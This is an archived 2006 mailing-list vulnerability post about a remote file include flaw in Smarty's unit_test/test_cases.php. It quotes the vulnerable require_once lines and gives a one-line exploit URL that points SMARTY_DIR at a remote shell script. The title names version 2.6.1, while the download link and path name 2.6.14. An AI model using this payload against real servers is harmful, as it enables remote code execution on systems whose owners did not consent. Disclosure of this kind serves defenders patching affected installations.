Smarty-2.6.1 Remote File Include Vulnerabilities
- From: crackers_child@xxxxxxxxxxxxxxxxxxx
- Date: 23 Oct 2006 16:30:07 -0000
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : Smarty-2.6.1 Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@xxxxxxxxxxxxxxxxxxx
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application Download : http://smarty.php.net/do_download.php?download_file=Smarty-2.6.14.tar.gz
--------------------------------------------------------------------------------
Bug İn test_cases.php
<?php
require_once './config.php';
require_once SMARTY_DIR . 'Smarty.class.php';
require_once 'PHPUnit.php';
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll?
--------------------------------------------------------------------------------
greets:
X_ALPEREN_X and All SiberSavascilar.CoM Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
- Follow-Ups:
- Re: Smarty-2.6.1 Remote File Include Vulnerabilities
- From: J. Carlos Nieto
- Re: Smarty-2.6.1 Remote File Include Vulnerabilities
- Prev by Date: Flaw in Firefox 2.0 Final
- Next by Date: SQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES
- Previous by thread: Flaw in Firefox 2.0 Final
- Next by thread: Re: Smarty-2.6.1 Remote File Include Vulnerabilities
- Index(es):
Relevant Pages
|
